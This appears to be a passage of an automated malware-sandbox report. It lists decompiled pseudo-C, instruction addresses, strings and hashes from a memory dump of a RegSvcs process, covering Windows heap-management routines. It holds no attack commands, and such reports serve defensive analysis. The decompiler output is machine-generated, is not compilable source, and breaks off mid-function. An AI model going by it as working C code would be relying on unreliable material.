				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x13e8748 - 1;
					if( *0x13e8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E012FB150();
									_t260 = _t257 + 4;
								} else {
									E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E012FB150();
								_t257 = _t260 + 4;
								__eflags =  *0x13e7bc8;
								if(__eflags == 0) {
									E013B2073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E013BA80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E0134D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E0131AB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E013BA80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E013BA80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x13e8748 - 1;
					if( *0x13e8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E012FB150();
							} else {
								E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E012FB150();
							__eflags =  *0x13e7bc8;
							if(__eflags == 0) {
								_t131 = E013B2073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                                          0x0131a83a
                                          0x0131a83c
                                          0x0131a83e
                                          0x0131a841
                                          0x0131a844
                                          0x0131a84a
                                          0x0131aa53
                                          0x0131aa59
                                          0x0131aa59
                                          0x0131a858
                                          0x0131a85e
                                          0x0131aaf5
                                          0x0131aafc
                                          0x0136229e
                                          0x013622a2
                                          0x013622a8
                                          0x013622b3
                                          0x013622b5
                                          0x013622bb
                                          0x013622c1
                                          0x013622c5
                                          0x013622e6
                                          0x013622eb
                                          0x013622f0
                                          0x013622c7
                                          0x013622dc
                                          0x013622e1
                                          0x013622e1
                                          0x013622f3
                                          0x013622f8
                                          0x013622fd
                                          0x01362300
                                          0x01362307
                                          0x0136230e
                                          0x0136230e
                                          0x01362313
                                          0x01362313
                                          0x013622b5
                                          0x013622a2
                                          0x0131aafc
                                          0x0131a864
                                          0x0131a869
                                          0x0131aa5c
                                          0x0131aa5e
                                          0x0131a86f
                                          0x0131a87f
                                          0x0131a885
                                          0x0131a885
                                          0x0131a88b
                                          0x0131a890
                                          0x0131a896
                                          0x0131ab0c
                                          0x0131ab0f
                                          0x0131ab15
                                          0x01362320
                                          0x01362320
                                          0x0131ab1b
                                          0x0131a89c
                                          0x0131a89f
                                          0x0131a8a2
                                          0x0131a8a2
                                          0x0131a8a5
                                          0x0131a8af
                                          0x0131a8b3
                                          0x0131a8b8
                                          0x0131aa66
                                          0x0131a8be
                                          0x0131a8c5
                                          0x0131a8c6
                                          0x0131a8ce
                                          0x01362328
                                          0x01362332
                                          0x01362337
                                          0x01362337
                                          0x0131a8ce
                                          0x0131a8d4
                                          0x0131a8d8
                                          0x0131a8db
                                          0x0131a8de
                                          0x0131a8e1
                                          0x0131a8e5
                                          0x0131a8e8
                                          0x0131a8f0
                                          0x0131a8f3
                                          0x0136234c
                                          0x01362350
                                          0x01362355
                                          0x01362359
                                          0x01362359
                                          0x0131a8f9
                                          0x0131a901
                                          0x0131aae4
                                          0x0131aae4
                                          0x0131aaea
                                          0x00000000
                                          0x0131a907
                                          0x0131a90a
                                          0x0131a91d
                                          0x0131a91d
                                          0x00000000
                                          0x0131a910
                                          0x0131a910
                                          0x0131a910
                                          0x0131a914
                                          0x0131a924
                                          0x0131a924
                                          0x0131a924
                                          0x0131a924
                                          0x0131a916
                                          0x0131a91b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0131a91b
                                          0x0131a925
                                          0x0131a925
                                          0x0131a932
                                          0x0131a936
                                          0x0131a93c
                                          0x0131a93c
                                          0x0131a93c
                                          0x0131ab22
                                          0x0131ab24
                                          0x0131ab27
                                          0x0131ab27
                                          0x0131a942
                                          0x0131a944
                                          0x0131aaba
                                          0x0131aabd
                                          0x0131aac0
                                          0x0131aac0
                                          0x0131aac2
                                          0x0131ab2f
                                          0x0131aac4
                                          0x0131aac4
                                          0x0131aac7
                                          0x0131aaca
                                          0x0131aacc
                                          0x0131aace
                                          0x0131aace
                                          0x0131aace
                                          0x0131aad1
                                          0x0131aad1
                                          0x0131aad7
                                          0x0131aad9
                                          0x00000000
                                          0x00000000
                                          0x01362361
                                          0x01362369
                                          0x0136236b
                                          0x00000000
                                          0x01362371
                                          0x00000000
                                          0x01362371
                                          0x00000000
                                          0x0136236b
                                          0x0131aac0
                                          0x0131a94a
                                          0x0131a94a
                                          0x0131a94d
                                          0x0131a94d
                                          0x0131a950
                                          0x0131a954
                                          0x01362376
                                          0x01362380
                                          0x0131a95a
                                          0x0131a95a
                                          0x0131a95c
                                          0x0131a95f
                                          0x0131a961
                                          0x0131a961
                                          0x0131a967
                                          0x0131a96a
                                          0x0131a972
                                          0x0131aa02
                                          0x0131aa06
                                          0x0131aa10
                                          0x0131aa16
                                          0x0131aa16
                                          0x0131aa1b
                                          0x0131aa21
                                          0x0131aa24
                                          0x0131aa27
                                          0x0131aa29
                                          0x0131aa2c
                                          0x0131aa32
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0131a978
                                          0x0131a978
                                          0x0131a97b
                                          0x0131a981
                                          0x0131a996
                                          0x0131a998
                                          0x0131a99f
                                          0x0131a9a2
                                          0x0136238a
                                          0x0131a9a8
                                          0x0131a9a8
                                          0x0131a9a8
                                          0x0131a9aa
                                          0x0131a9ad
                                          0x0131a9b0
                                          0x0131a9bb
                                          0x0131a9be
                                          0x0131a9c7
                                          0x0131a9c9
                                          0x0131a9c9
                                          0x0131a9cc
                                          0x0131a9d1
                                          0x0131aa6d
                                          0x0131aa70
                                          0x0131aa73
                                          0x0131aa75
                                          0x0131aa79
                                          0x0131aa7e
                                          0x0131aa82
                                          0x0131aa8f
                                          0x0131aa94
                                          0x0131aa96
                                          0x01362392
                                          0x013623a1
                                          0x013623a1
                                          0x0131aa9c
                                          0x0131aa9f
                                          0x0131aaa2
                                          0x0131aaa2
                                          0x0131aaa8
                                          0x0131aaab
                                          0x0131aaaf
                                          0x00000000
                                          0x0131aab5
                                          0x00000000
                                          0x0131aab5
                                          0x0131a9d7
                                          0x0131a9d7
                                          0x0131a9da
                                          0x0131a9e0
                                          0x0131a9e3
                                          0x0131a9e6
                                          0x0131a9e9
                                          0x0131a9eb
                                          0x0131a9fd
                                          0x0131a9fd
                                          0x00000000
                                          0x0131a9eb
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0131a983
                                          0x0131a983
                                          0x0131a983
                                          0x0131a987
                                          0x0131a995
                                          0x0131a995
                                          0x0131a995
                                          0x0131a995
                                          0x0131a989
                                          0x0131a98e
                                          0x00000000
                                          0x0131a990
                                          0x00000000
                                          0x0131a990
                                          0x0131a98e
                                          0x00000000
                                          0x0131a983
                                          0x0131a972
                                          0x0131a90a
                                          0x0131aa34
                                          0x0131aa34
                                          0x0131aa40
                                          0x0131aa43
                                          0x0131aa46
                                          0x0131aa4d
                                          0x013623ab
                                          0x013623b2
                                          0x013623b8
                                          0x013623be
                                          0x013623c3
                                          0x013623c5
                                          0x013623cb
                                          0x013623d1
                                          0x013623d5
                                          0x013623f6
                                          0x013623fb
                                          0x013623d7
                                          0x013623ec
                                          0x013623f1
                                          0x01362403
                                          0x01362408
                                          0x01362410
                                          0x01362417
                                          0x01362422
                                          0x01362422
                                          0x01362417
                                          0x013623c5
                                          0x013623b2
                                          0x00000000

                                          Strings
                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01362403
                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 013622F3
                                          • HEAP: , xrefs: 013622E6, 013623F6
                                          • HEAP[%wZ]: , xrefs: 013622D7, 013623E7
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                          • API String ID: 0-1657114761
                                          • Opcode ID: 1fbc88fc22691d7f5eed042edf571a498cbe51ff8157bcb8d99793cea13938a0
                                          • Instruction ID: 6ea37f7fd83ef16365d532a720bfb7cb5e84a6ec67bcaf02694fa59db0e0dbd7
                                          • Opcode Fuzzy Hash: 1fbc88fc22691d7f5eed042edf571a498cbe51ff8157bcb8d99793cea13938a0
                                          • Instruction Fuzzy Hash: 84D1E53460128A8FDB19CF6CC4907BABBF6FF48309F158569D95A9B74AE330E841CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0131A229 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 69%
                                          			E0131A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E0131DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E01339730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E013BA80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E01339660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E012FB150();
					} else {
						E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E012FB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E01317D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E013B138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E01317D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E01317D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E013B1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E01317D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E01317D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E013B1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0134D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                          0x0131a229
                                          0x0131a231
                                          0x0131a23f
                                          0x0131a242
                                          0x0131a244
                                          0x0131a24c
                                          0x0131a255
                                          0x0131a25a
                                          0x0131a25f
                                          0x01361c76
                                          0x01361c78
                                          0x01361c7e
                                          0x01361c7f
                                          0x01361c81
                                          0x01361c82
                                          0x01361c84
                                          0x01361c89
                                          0x01361c8b
                                          0x01361c9e
                                          0x01361c9e
                                          0x01361cab
                                          0x01361cb2
                                          0x00000000
                                          0x01361cb2
                                          0x01361c8d
                                          0x01361c92
                                          0x00000000
                                          0x00000000
                                          0x01361c94
                                          0x01361c98
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01361c98
                                          0x0131a265
                                          0x0131a265
                                          0x0131a266
                                          0x0131a26f
                                          0x0131a270
                                          0x0131a276
                                          0x0131a277
                                          0x0131a279
                                          0x0131a27e
                                          0x0131a282
                                          0x01361db5
                                          0x01361dbb
                                          0x01361dc1
                                          0x01361dc5
                                          0x01361de4
                                          0x01361de9
                                          0x01361dc7
                                          0x01361ddc
                                          0x01361de1
                                          0x01361def
                                          0x01361df3
                                          0x01361df7
                                          0x01361dfe
                                          0x01361e06
                                          0x0131a302
                                          0x0131a308
                                          0x0131a308
                                          0x0131a288
                                          0x0131a28d
                                          0x0131a294
                                          0x01361cc1
                                          0x0131a29a
                                          0x0131a29a
                                          0x0131a29a
                                          0x0131a29f
                                          0x01361ccb
                                          0x01361cd1
                                          0x01361cd8
                                          0x01361cea
                                          0x01361cea
                                          0x01361cd8
                                          0x0131a2a9
                                          0x0131a2af
                                          0x0131a2bc
                                          0x01361cfd
                                          0x0131a2c2
                                          0x0131a2c2
                                          0x0131a2c2
                                          0x0131a2c7
                                          0x01361d07
                                          0x01361d0d
                                          0x01361d14
                                          0x01361d1f
                                          0x01361d21
                                          0x01361d2c
                                          0x01361d2c
                                          0x01361d2c
                                          0x01361d47
                                          0x01361d47
                                          0x01361d14
                                          0x0131a2cd
                                          0x0131a2d2
                                          0x0131a2d9
                                          0x01361d5a
                                          0x0131a2df
                                          0x0131a2df
                                          0x0131a2df
                                          0x0131a2e4
                                          0x01361d69
                                          0x01361d6b
                                          0x01361d76
                                          0x01361d76
                                          0x01361d76
                                          0x01361d91
                                          0x01361d91
                                          0x0131a2ea
                                          0x0131a2f0
                                          0x0131a2f5
                                          0x01361da8
                                          0x01361dad
                                          0x01361dad
                                          0x0131a2fd
                                          0x0131a300
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                          • API String ID: 2994545307-2586055223
                                          • Opcode ID: fc9b2424dcc484a92332ccd42a222caef7966765645269cfb9763c5b014a3d1e
                                          • Instruction ID: b0b151bb6cd211b872b8a42016d09a2ce2cb9debe1183189c310f5f6c9788ac0
                                          • Opcode Fuzzy Hash: fc9b2424dcc484a92332ccd42a222caef7966765645269cfb9763c5b014a3d1e
                                          • Instruction Fuzzy Hash: 475133322056859FE722EB6CC844F777BECFF90B58F084468F9518B696D764D801CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013B49A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                          • API String ID: 2994545307-336120773
                                          • Opcode ID: 54159773ba8e9591e342aa098d13db3b715042dec472881fc96acce6888dabd3
                                          • Instruction ID: 560a60a1eba4cf6502f1489170544b90fd0dbe88d4638b5d884cee8c0e21ba1e
                                          • Opcode Fuzzy Hash: 54159773ba8e9591e342aa098d13db3b715042dec472881fc96acce6888dabd3
                                          • Instruction Fuzzy Hash: 3B312632610114EFE720DB5DC8C9FA7B7E8EF04628F244069F6069BA92E770A940C75E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013BD616 Relevance: 4.7, APIs: 3, Instructions: 216timeCOMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 60%
                                          			E013BD616(signed int __ecx, intOrPtr __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t79;
				signed char _t86;
				signed int _t88;
				void* _t91;
				signed int _t94;
				signed int _t95;
				unsigned int _t96;
				signed int _t110;
				signed char _t118;
				intOrPtr _t120;
				signed int _t123;
				signed int _t124;
				signed char _t131;
				signed int _t133;
				signed int _t137;
				signed char _t147;
				signed int _t153;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t164;
				signed int _t169;
				signed int _t173;

				_v8 =  *0x13ed360 ^ _t173;
				_t120 = __edx;
				_t159 = __ecx;
				_v40 = __edx;
				_t150 =  *(__edx + 1) & 0x000000ff;
				_t174 =  *0x13e610c & 0x00000001;
				_t160 = 0;
				_v24 = 0;
				_v28 =  *(0x12daef0 + ( *(__edx + 1) & 0x000000ff) * 2) & 0x0000ffff;
				if(( *0x13e610c & 0x00000001) == 0) {
					_v12 = 0;
				} else {
					_v12 = E013BC70A(__ecx + 0x38, _t150);
				}
				_t79 = E013BC5FF(_t120, 0, _t174);
				_t153 = _t79 * _v28;
				_v36 = _t153;
				_v32 = (0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + ((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + 0xfff + _t153 >> 0xc) * 2;
				_t86 = E013BA359((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + ((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + 0xfff + _t153 >> 0xc) * 2 + _t153,  *((intOrPtr*)(_t159 + 0x2c)));
				_t131 = _t86;
				_v16 = _t86;
				if(_t131 <= 0xc) {
					_t131 = 0xc;
					_v16 = _t131;
				}
				_t123 = 1 << _t131;
				_v20 = 1;
				if(( *0x13e610c & 0x00000008) == 0) {
					L11:
					_t88 = 1;
					__eflags = 1;
					L12:
					_t133 = _a4 & _t88;
					_v32 = _t133;
					if(_t133 == 0) {
						L0131FAD0(_t159 + 0x34);
